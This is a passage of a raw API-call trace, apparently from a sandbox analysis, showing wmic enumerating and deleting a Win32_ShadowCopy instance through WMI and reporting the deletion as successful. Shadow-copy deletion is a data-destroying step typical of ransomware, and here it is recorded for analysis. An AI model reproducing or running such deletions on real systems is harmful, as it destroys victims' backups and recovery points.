wReserved3=0x0, varVal1=0x37a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0084.985] free (_Block=0x13cb80) [0084.985] malloc (_Size=0x18) returned 0x13cb80 [0084.985] GetCurrentThreadId () returned 0x8ac [0084.985] ??0CHString@@QEAA@XZ () returned 0x1cf638 [0084.985] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf650 [0084.985] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1cf5e0 [0084.985] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0084.985] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x13d020 [0084.985] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0084.985] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf5a0 [0084.986] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf5e8 [0084.986] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf650 [0084.986] ??1CHString@@QEAA@XZ () returned 0x4f34de01 [0084.986] ??1CHString@@QEAA@XZ () returned 0x4f34de01 [0084.986] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf5a8 [0084.986] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf5e0 [0084.986] ??1CHString@@QEAA@XZ () returned 0x1 [0084.986] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x13d090 [0084.986] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0084.986] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf5a0 [0084.986] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf5e8 [0084.986] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf650 [0084.986] ??1CHString@@QEAA@XZ () returned 0x4f34de01 [0084.986] ??1CHString@@QEAA@XZ () returned 0x4f34de01 [0084.986] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf5a8 [0084.986] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf5e0 [0084.986] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.986] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0084.986] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.986] malloc (_Size=0x18) returned 0x13cba0 [0084.986] malloc (_Size=0x18) returned 0x13cc00 [0084.986] malloc (_Size=0x18) returned 0x13cc20 [0084.986] malloc (_Size=0x18) returned 0x13cc40 [0084.986] malloc (_Size=0x18) returned 0x13cc60 [0084.986] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0084.986] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0084.987] malloc (_Size=0x18) returned 0x13cc80 [0084.987] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0084.987] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0084.987] malloc (_Size=0x18) returned 0x13cca0 [0084.987] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0084.987] SysStringLen (param_1="\"") returned 0x1 [0084.987] free (_Block=0x13cc80) [0084.987] free (_Block=0x13cc60) [0084.987] free (_Block=0x13cc40) [0084.987] free (_Block=0x13cc20) [0084.987] free (_Block=0x13cc00) [0084.987] free (_Block=0x13cba0) [0084.987] IWbemServices:GetObject (in: This=0x1e03b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1cf628*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf628*=0x1e10a50, ppCallResult=0x0) returned 0x0 [0084.989] malloc (_Size=0x18) returned 0x13cba0 [0084.990] IWbemClassObject:Get (in: This=0x1e10a50, wszName="Text", lFlags=0, pVal=0x1cf660*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff172ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf660*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x374aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2fe030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0084.990] free (_Block=0x13cba0) [0084.990] SafeArrayGetLBound (in: psa=0x374aa0, nDim=0x1, plLbound=0x1cf640 | out: plLbound=0x1cf640) returned 0x0 [0084.990] SafeArrayGetUBound (in: psa=0x374aa0, nDim=0x1, plUbound=0x1cf630 | out: plUbound=0x1cf630) returned 0x0 [0084.990] SafeArrayGetElement (in: psa=0x374aa0, rgIndices=0x1cf624, pv=0x1cf678 | out: pv=0x1cf678) returned 0x0 [0084.990] malloc (_Size=0x18) returned 0x13cba0 [0084.990] malloc (_Size=0x18) returned 0x13cc00 [0084.990] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0084.990] free (_Block=0x13cba0) [0084.990] IUnknown:Release (This=0x1e10a50) returned 0x0 [0084.990] free (_Block=0x13cca0) [0084.990] ??1CHString@@QEAA@XZ () returned 0x4f34de01 [0084.990] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.990] free (_Block=0x13cb80) [0084.990] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.990] lstrlenW (lpString="Shadow copy management.") returned 23 [0084.991] malloc (_Size=0x30) returned 0x1385c0 [0084.991] lstrlenW (lpString="Shadow copy management.") returned 23 [0084.991] free (_Block=0x13cc00) [0084.991] IUnknown:Release (This=0x1e104e0) returned 0x0 [0084.991] free (_Block=0x13cbc0) [0084.991] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.991] lstrlenW (lpString="PATH") returned 4 [0084.991] lstrlenW (lpString="where") returned 5 [0084.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0084.991] lstrlenW (lpString="WHERE") returned 5 [0084.991] lstrlenW (lpString="where") returned 5 [0084.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0084.991] lstrlenW (lpString="/") returned 1 [0084.991] lstrlenW (lpString="ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'") returned 43 [0084.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0084.991] lstrlenW (lpString="-") returned 1 [0084.991] lstrlenW (lpString="ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'") returned 43 [0084.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0084.991] lstrlenW (lpString="ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'") returned 43 [0084.991] malloc (_Size=0x58) returned 0x13d020 [0084.991] lstrlenW (lpString="ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'") returned 43 [0084.991] lstrlenW (lpString="/") returned 1 [0084.991] lstrlenW (lpString="delete") returned 6 [0084.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0084.991] lstrlenW (lpString="-") returned 1 [0084.991] lstrlenW (lpString="delete") returned 6 [0084.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0084.992] lstrlenW (lpString="delete") returned 6 [0084.992] malloc (_Size=0xe) returned 0x13cbc0 [0084.992] lstrlenW (lpString="delete") returned 6 [0084.992] lstrlenW (lpString="GET") returned 3 [0084.992] lstrlenW (lpString="delete") returned 6 [0084.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0084.992] lstrlenW (lpString="LIST") returned 4 [0084.992] lstrlenW (lpString="delete") returned 6 [0084.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0084.992] lstrlenW (lpString="SET") returned 3 [0084.992] lstrlenW (lpString="delete") returned 6 [0084.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0084.992] lstrlenW (lpString="CREATE") returned 6 [0084.992] lstrlenW (lpString="delete") returned 6 [0084.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0084.992] lstrlenW (lpString="CALL") returned 4 [0084.992] lstrlenW (lpString="delete") returned 6 [0084.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0084.992] lstrlenW (lpString="ASSOC") returned 5 [0084.992] lstrlenW (lpString="delete") returned 6 [0084.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0084.992] lstrlenW (lpString="DELETE") returned 6 [0084.992] lstrlenW (lpString="delete") returned 6 [0084.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0084.992] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0084.992] malloc (_Size=0x3e) returned 0x13d080 [0084.993] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0084.993] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0084.993] malloc (_Size=0x18) returned 0x13cc00 [0084.993] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0084.993] lstrlenW (lpString="FROM") returned 4 [0084.993] lstrlenW (lpString="*") returned 1 [0084.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0084.993] malloc (_Size=0x18) returned 0x13cb80 [0084.993] free (_Block=0x13cc00) [0084.993] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0084.993] lstrlenW (lpString="FROM") returned 4 [0084.993] lstrlenW (lpString="from") returned 4 [0084.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0084.993] malloc (_Size=0x18) returned 0x13cc00 [0084.993] free (_Block=0x13cb80) [0084.993] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0084.993] malloc (_Size=0x18) returned 0x13cb80 [0084.993] free (_Block=0x13cc00) [0084.993] free (_Block=0x13d080) [0084.993] free (_Block=0x13cb80) [0084.993] lstrlenW (lpString="SET") returned 3 [0084.994] lstrlenW (lpString="delete") returned 6 [0084.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0084.994] lstrlenW (lpString="CREATE") returned 6 [0084.994] lstrlenW (lpString="delete") returned 6 [0084.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0084.994] free (_Block=0x13cef0) [0084.994] malloc (_Size=0x8) returned 0x136f20 [0084.994] lstrlenW (lpString="GET") returned 3 [0084.994] lstrlenW (lpString="delete") returned 6 [0084.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0084.994] lstrlenW (lpString="LIST") returned 4 [0084.994] lstrlenW (lpString="delete") returned 6 [0084.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0084.994] lstrlenW (lpString="ASSOC") returned 5 [0084.994] lstrlenW (lpString="delete") returned 6 [0084.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0084.994] WbemLocator:IUnknown:AddRef (This=0x1df1390) returned 0x3 [0084.994] free (_Block=0x1ddfb0) [0084.994] lstrlenW (lpString="") returned 0 [0084.994] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0084.994] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.994] malloc (_Size=0x14) returned 0x13cb80 [0084.994] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.994] GetCurrentThreadId () returned 0x8ac [0084.994] GetCurrentProcess () returned 0xffffffffffffffff [0084.994] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cfa00 | out: TokenHandle=0x1cfa00*=0x27c) returned 1 [0084.995] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf9f8 | out: TokenInformation=0x0, ReturnLength=0x1cf9f8) returned 0 [0084.995] malloc (_Size=0x118) returned 0x13d080 [0084.995] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x13d080, TokenInformationLength=0x118, ReturnLength=0x1cf9f8 | out: TokenInformation=0x13d080, ReturnLength=0x1cf9f8) returned 1 [0084.995] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x13d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1372267464, Attributes=0x6683), (Luid.LowPart=0x0, Luid.HighPart=1298160, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0084.995] free (_Block=0x13d080) [0084.995] CloseHandle (hObject=0x27c) returned 1 [0084.995] lstrlenW (lpString="GET") returned 3 [0084.995] lstrlenW (lpString="delete") returned 6 [0084.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0084.995] lstrlenW (lpString="LIST") returned 4 [0084.995] lstrlenW (lpString="delete") returned 6 [0084.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0084.995] lstrlenW (lpString="SET") returned 3 [0084.995] lstrlenW (lpString="delete") returned 6 [0084.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0084.995] lstrlenW (lpString="CALL") returned 4 [0084.995] lstrlenW (lpString="delete") returned 6 [0084.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0084.995] lstrlenW (lpString="ASSOC") returned 5 [0084.995] lstrlenW (lpString="delete") returned 6 [0084.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0084.995] lstrlenW (lpString="CREATE") returned 6 [0084.995] lstrlenW (lpString="delete") returned 6 [0084.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0084.995] lstrlenW (lpString="DELETE") returned 6 [0084.996] lstrlenW (lpString="delete") returned 6 [0084.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0084.996] malloc (_Size=0x18) returned 0x13cc00 [0084.996] lstrlenA (lpString="") returned 0 [0084.996] malloc (_Size=0x2) returned 0x1ddfb0 [0084.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff10314c, cbMultiByte=-1, lpWideCharStr=0x1ddfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0084.996] free (_Block=0x1ddfb0) [0084.996] malloc (_Size=0x18) returned 0x13cca0 [0084.996] lstrlenA (lpString="") returned 0 [0084.996] malloc (_Size=0x2) returned 0x1ddfb0 [0084.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff10314c, cbMultiByte=-1, lpWideCharStr=0x1ddfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0084.996] free (_Block=0x1ddfb0) [0084.996] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0084.996] malloc (_Size=0x3e) returned 0x13d080 [0084.996] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0084.996] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0084.996] malloc (_Size=0x18) returned 0x13cba0 [0084.996] free (_Block=0x13cca0) [0084.996] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0084.996] lstrlenW (lpString="FROM") returned 4 [0084.997] lstrlenW (lpString="*") returned 1 [0084.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0084.997] malloc (_Size=0x18) returned 0x13cca0 [0084.997] free (_Block=0x13cba0) [0084.997] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0084.997] lstrlenW (lpString="FROM") returned 4 [0084.997] lstrlenW (lpString="from") returned 4 [0084.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0084.997] malloc (_Size=0x18) returned 0x13cba0 [0084.997] free (_Block=0x13cca0) [0084.997] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0084.997] malloc (_Size=0x18) returned 0x13cca0 [0084.997] free (_Block=0x13cba0) [0084.997] free (_Block=0x13d080) [0084.997] malloc (_Size=0x18) returned 0x13cba0 [0084.997] malloc (_Size=0x18) returned 0x13cc20 [0084.997] malloc (_Size=0x18) returned 0x13cc40 [0084.997] malloc (_Size=0x18) returned 0x13cc60 [0084.997] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0084.997] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0084.998] malloc (_Size=0x18) returned 0x13cc80 [0084.998] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0084.998] SysStringLen (param_1=" WHERE ") returned 0x7 [0084.998] malloc (_Size=0x18) returned 0x13ccc0 [0084.998] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0084.998] SysStringLen (param_1="ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'") returned 0x2b [0084.998] free (_Block=0x13cc00) [0084.998] free (_Block=0x13cc80) [0084.998] free (_Block=0x13cc60) [0084.998] free (_Block=0x13cc40) [0084.998] free (_Block=0x13cc20) [0084.998] free (_Block=0x13cba0) [0084.998] ??0CHString@@QEAA@XZ () returned 0x1cf970 [0084.998] GetCurrentThreadId () returned 0x8ac [0084.998] malloc (_Size=0x18) returned 0x13cba0 [0084.998] malloc (_Size=0x18) returned 0x13cc20 [0084.998] malloc (_Size=0x18) returned 0x13cc40 [0084.998] malloc (_Size=0x18) returned 0x13cc60 [0084.998] malloc (_Size=0x18) returned 0x13cc80 [0084.998] SysStringLen (param_1="\\\\") returned 0x2 [0084.999] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0084.999] malloc (_Size=0x18) returned 0x13cc00 [0084.999] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0084.999] SysStringLen (param_1="\\") returned 0x1 [0084.999] malloc (_Size=0x18) returned 0x13cce0 [0084.999] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0084.999] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0084.999] free (_Block=0x13cc00) [0084.999] free (_Block=0x13cc80) [0084.999] free (_Block=0x13cc60) [0084.999] free (_Block=0x13cc40) [0084.999] free (_Block=0x13cc20) [0084.999] free (_Block=0x13cba0) [0084.999] malloc (_Size=0x18) returned 0x13cba0 [0084.999] malloc (_Size=0x18) returned 0x13cc20 [0084.999] malloc (_Size=0x18) returned 0x13cc40 [0085.000] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1df1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff1729d0 | out: ppNamespace=0xff1729d0*=0x1e03c18) returned 0x0 [0085.007] free (_Block=0x13cc40) [0085.007] free (_Block=0x13cc20) [0085.007] free (_Block=0x13cba0) [0085.007] CoSetProxyBlanket (pProxy=0x1e03c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0085.007] free (_Block=0x13cce0) [0085.007] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0085.007] ??0CHString@@QEAA@XZ () returned 0x1cf8c0 [0085.007] GetCurrentThreadId () returned 0x8ac [0085.007] malloc (_Size=0x18) returned 0x13cce0 [0085.007] lstrlenA (lpString="") returned 0 [0085.007] malloc (_Size=0x2) returned 0x1ddfb0 [0085.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff10314c, cbMultiByte=-1, lpWideCharStr=0x1ddfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0085.007] free (_Block=0x1ddfb0) [0085.007] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'") returned 0x50 [0085.007] SysStringLen (param_1="") returned 0x0 [0085.007] free (_Block=0x13cce0) [0085.007] malloc (_Size=0x18) returned 0x13cce0 [0085.008] IWbemServices:ExecQuery (in: This=0x1e03c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'", lFlags=0, pCtx=0x0, ppEnum=0x1cf8c8 | out: ppEnum=0x1cf8c8*=0x1e03d18) returned 0x0 [0085.083] free (_Block=0x13cce0) [0085.083] CoSetProxyBlanket (pProxy=0x1e03d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0085.086] IEnumWbemClassObject:Next (in: This=0x1e03d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf8d0, puReturned=0x1cf8e0 | out: apObjects=0x1cf8d0*=0x1e03d80, puReturned=0x1cf8e0*=0x1) returned 0x0 [0085.087] malloc (_Size=0x18) returned 0x13cce0 [0085.087] IWbemClassObject:Get (in: This=0x1e03d80, wszName="__PATH", lFlags=0, pVal=0x1cf8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0085.088] free (_Block=0x13cce0) [0085.088] malloc (_Size=0x800) returned 0x13d080 [0085.088] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x13d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0085.088] FormatMessageW (in: dwFlags=0x2500, lpSource=0x13d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf818, nSize=0x0, Arguments=0x1cf828 | out: lpBuffer="뚐5") returned 0x67 [0085.088] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0085.088] malloc (_Size=0x68) returned 0x13d890 [0085.088] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x13d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0085.088] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff172ab0 [0085.088] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0085.088] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0085.088] free (_Block=0x13d890) [0085.088] free (_Block=0x13d080) [0085.088] LocalFree (hMem=0x35b690) returned 0x0 [0085.088] IWbemServices:DeleteInstance (in: This=0x1e03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0089.542] IUnknown:Release (This=0x1e03d80) returned 0x0 [0089.542] malloc (_Size=0x800) returned 0x13d080 [0089.542] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x13d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0089.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0089.542] malloc (_Size=0x20) returned 0x13cef0 [0089.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x13cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0089.542] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 